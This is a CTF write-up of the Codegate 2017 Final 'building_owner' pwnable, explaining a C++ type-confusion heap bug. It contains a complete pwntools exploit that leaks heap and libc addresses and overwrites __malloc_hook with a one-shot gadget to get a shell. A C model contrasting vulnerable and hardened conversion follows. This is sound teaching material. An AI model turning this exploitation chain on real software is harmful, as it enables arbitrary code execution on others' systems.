Codegate 2017 Final building_owner
Pwnable/CTF 2018. 1. 21. 20:12
This challenge has a type confusion vulnerability. The manage function offers two operations, edit and change. Looking at the change path: an object that was originally of the company type can be changed to the restaurant type with that function, and because the two types have different sizes, the larger type's fields run past the end of the original object, which gives an overflow. Through the name pointer that now overlaps the neighbouring object you can leak a heap address, then leak main_arena, and from there carry out the attack.
A std::string object behaves as follows: when "A"*17 is entered, a chunk of size 0x21 is allocated, and when 25 characters are entered, that 0x21 chunk is freed and a 0x31 chunk is allocated. This behaviour can be used for the main_arena leak.

The structures (field offsets in bytes) are as follows:

```
apart {
    string  name   0
    int64_t floor  32
    string  about  40
    int64_t house  72
}

company {
    string   name   0
    int64_t  floor  32
    string   about  40
    uint64_t people 72
    uint64_t money  80
}

restaurant {
    string  name   0
    int64_t floor  32
    string  about  40
    int64_t people 72
    int64_t money  80
    int64_t menu   88
    int64_t price  96
    int64_t pay    104
}
```

Exploit script:

```python
from pwn import *

p = process("./building_owner")
elf = ELF("./building_owner")

def apartment(name, floor, house, about):
    p.sendlineafter('> ', '1')
    p.sendlineafter('?', name)
    p.sendlineafter('? ', str(floor))
    p.sendlineafter('? ', str(house))
    p.sendlineafter(': ', about)

def company(name, floor, people, money, about):
    p.sendlineafter('> ', '2')
    p.sendlineafter('?', name)
    p.sendlineafter('? ', str(floor))
    p.sendlineafter('? ', str(people))
    p.sendlineafter('? ', str(money))
    p.sendlineafter(': ', about)

def restaurant(name, floor, menu, people, money, price, pay, about):
    p.sendlineafter('> ', '3')
    p.sendlineafter('?', name)
    p.sendlineafter('? ', str(floor))
    p.sendlineafter('? ', str(menu))
    p.sendlineafter('? ', str(people))
    p.sendlineafter('? ', str(money))
    p.sendlineafter('? ', str(price))
    p.sendlineafter('?', str(pay))
    p.sendlineafter(': ', about)

def manage():
    p.sendlineafter('> ', '4')

def edit_start(type_, idx):
    p.sendlineafter('> ', '1')
    p.sendlineafter('> ', str(type_))
    p.sendlineafter('> ', str(idx))

def change(type_, idx, kind):
    p.sendlineafter('> ', '2')
    p.sendlineafter('> ', str(type_))
    p.sendlineafter('> ', str(idx))
    p.sendlineafter('> ', str(kind))
    p.sendlineafter('> ', '5')

def exit():
    p.sendlineafter('> ', '3')

apartment("AAAA", 10, 10, "AAAA")
company("B"*9, 20, 20, 20, "BBBB")  # "B"*9 len == 9 -> main_arena 8byte leak
restaurant("CCCC", 30, 30, 30, 30, 30, 30, "CCCC")

# type confusion: the apart object is reinterpreted as a restaurant,
# so the restaurant's price field reads the neighbouring company's name pointer
manage()
change(1, 1, 2)  # apart idx 1 -> restaurant
edit_start(3, 2)
p.recvuntil('price of menu : ')
heap = int(p.recvuntil('\n').split('\n')[0], 10)  # company name pointer (heap address)
print(hex(heap))
p.sendlineafter('> ', '10')  # restaurant edit exit
p.sendlineafter('> ', '4')   # edit exit
exit()

leak_target = heap + 0x1b0  # heap location holding main_arena + 88
print(hex(leak_target))

company("b"*150, 20, 20, 20, "bbbb")  # leak heap

# point the company's name at leak_target and print it to read main_arena + 88
manage()
edit_start(3, 2)
p.sendlineafter('> ', '6')  # menu edit -> company name ptr edit
p.sendlineafter(': ', str(leak_target))
p.sendlineafter('> ', '10')  # restaurant edit exit
p.sendlineafter('> ', '2')
p.recvuntil('1. ')
main_arena = u64(p.recv(8)) - 88
malloc_hook = main_arena - 0x10
libc_base = malloc_hook - 0x3c4b10  # offsets for the challenge's libc
one_shot = libc_base + 0xf1147
print(hex(main_arena))
print(hex(malloc_hook))

# same primitive again: point the company's name at __malloc_hook and
# use "change name" as an arbitrary write
p.sendlineafter('> ', '3')  # company edit exit
p.sendlineafter('> ', '3')  # restaurant edit start
p.sendlineafter('> ', '2')  # type change idx -> 2
p.sendlineafter('> ', '6')  # company name ptr edit
p.sendlineafter(': ', str(malloc_hook))
p.sendlineafter('> ', '10')
p.sendlineafter('> ', '2')
p.sendlineafter('> ', '1')  # target malloc_hook
p.sendlineafter('> ', '1')  # company name change
p.sendlineafter(': ', p64(one_shot))  # malloc_hook edit
p.sendlineafter('> ', '6')
p.sendlineafter('> ', '4')
exit()
p.sendlineafter('> ', '1')  # apart malloc -> malloc_hook -> one_shot
p.interactive()
```
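The type confusion described above, as an added example that is not the challenge's code or the author's exploit: a C model of the three structs at the write-up's offsets, laid out on a hand-built imitation of two adjacent 0x60-byte glibc chunks, with the vulnerable in-place `change` beside a hardened one. The 32-byte `std::string` model, the simulated chunk offsets, and every function name here are assumptions made for illustration; the only facts taken from the page are the field offsets and sizes of the three types.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed model of libstdc++'s std::string on x86-64 (32 bytes: data pointer,
 * length, 16-byte inline buffer shared with the capacity).  The write-up's
 * offsets (name 0, floor 32, about 40) fit this layout. */
typedef struct { char *data; uint64_t len; char sso[16]; } str_t;

/* The three object types from the write-up.  may_alias tells the compiler the
 * reinterpretation below is intentional; in the real C++ binary it is plain UB. */
typedef struct __attribute__((may_alias)) {
    str_t name; int64_t floor; str_t about; int64_t house;
} apart_t;                                                    /* 80 bytes  */
typedef struct __attribute__((may_alias)) {
    str_t name; int64_t floor; str_t about; uint64_t people; uint64_t money;
} company_t;                                                  /* 88 bytes  */
typedef struct __attribute__((may_alias)) {
    str_t name; int64_t floor; str_t about; int64_t people; int64_t money;
    int64_t menu; int64_t price; int64_t pay;
} restaurant_t;                                               /* 112 bytes */

/* Simulated heap (assumption, not the real allocator): malloc(80) and
 * malloc(88) both round up to 0x60-byte chunks, so the apart object and the
 * company object sit 0x60 bytes apart with a 16-byte chunk header between. */
enum { APART_USER = 0x10, COMPANY_HDR = 0x60, COMPANY_USER = 0x70, HEAP_SIZE = 0x100 };
static uint8_t g_heap[HEAP_SIZE];

static void put64(size_t off, uint64_t v) { memcpy(g_heap + off, &v, sizeof v); }

static void str_inline(str_t *s, const char *v) {
    s->len = strlen(v);
    memcpy(s->sso, v, s->len + 1);  /* short strings stay inline (SSO) ...       */
    s->data = s->sso;               /* ... so the data pointer is a heap address */
}

/* Lay out apart and company as the program would after two allocations. */
static void build_heap(void) {
    memset(g_heap, 0, sizeof g_heap);
    put64(0x08, 0x61);             /* apart chunk:   size 0x60 | PREV_INUSE */
    put64(COMPANY_HDR + 8, 0x61);  /* company chunk: size 0x60 | PREV_INUSE */
    apart_t *a = (apart_t *)(g_heap + APART_USER);
    str_inline(&a->name, "AAAA"); a->floor = 10; str_inline(&a->about, "AAAA"); a->house = 10;
    company_t *c = (company_t *)(g_heap + COMPANY_USER);
    str_inline(&c->name, "BBBBBBBBB"); c->floor = 20; str_inline(&c->about, "BBBB");
    c->people = 20; c->money = 20;
}

/* Vulnerable 'change': the 80-byte apart is reinterpreted in place as a
 * 112-byte restaurant, so menu/price/pay (offsets 88/96/104) alias the next
 * chunk's size field, the company's name pointer and the company's name length. */
static restaurant_t *change_vulnerable(apart_t *a) { return (restaurant_t *)a; }

/* Hardened 'change': build a restaurant of the right size, copy only the fields
 * both types share, and re-point inline strings at their new buffer (a plain
 * struct copy would leave them pointing into the old object). */
static restaurant_t *change_hardened(const apart_t *a, restaurant_t *r) {
    memset(r, 0, sizeof *r);
    r->name = a->name;   if (a->name.data == a->name.sso)   r->name.data = r->name.sso;
    r->floor = a->floor;
    r->about = a->about; if (a->about.data == a->about.sso) r->about.data = r->about.sso;
    return r;  /* the caller frees the old apart object */
}

/* What the exploit's "price of menu" read leaks: the company's name pointer. */
int confusion_leaks_neighbour(void) {
    build_heap();
    company_t *c = (company_t *)(g_heap + COMPANY_USER);
    restaurant_t *r = change_vulnerable((apart_t *)(g_heap + APART_USER));
    return (uint64_t)r->menu  == 0x61                             /* next chunk's size field */
        && (uint64_t)r->price == (uint64_t)(uintptr_t)c->name.data /* heap pointer leak       */
        && (uint64_t)r->pay   == c->name.len;                     /* that name's length      */
}

/* The hardened conversion exposes nothing beyond the copied fields. */
int hardened_change_is_clean(void) {
    static restaurant_t r;
    build_heap();
    change_hardened((apart_t *)(g_heap + APART_USER), &r);
    return r.menu == 0 && r.price == 0 && r.pay == 0
        && r.name.data == r.name.sso && strcmp(r.name.data, "AAAA") == 0;
}

int main(void) {
    printf("sizeof apart/company/restaurant = %zu/%zu/%zu\n",
           sizeof(apart_t), sizeof(company_t), sizeof(restaurant_t));
    printf("in-place change leaks the neighbour: %s\n", confusion_leaks_neighbour() ? "yes" : "no");
    printf("hardened change is clean:            %s\n", hardened_change_is_clean() ? "yes" : "no");
    return 0;
}
```

The arithmetic the exploit relies on is visible in the offsets: relative to the apart object, offset 88 is the next chunk's size field, offset 96 is the first qword of the next object (the company's name pointer, which points at its own inline buffer, hence a heap address), and offset 104 is that string's length. The same aliasing is what later turns "edit menu" into a write of the company's name pointer and "change name" into an arbitrary write.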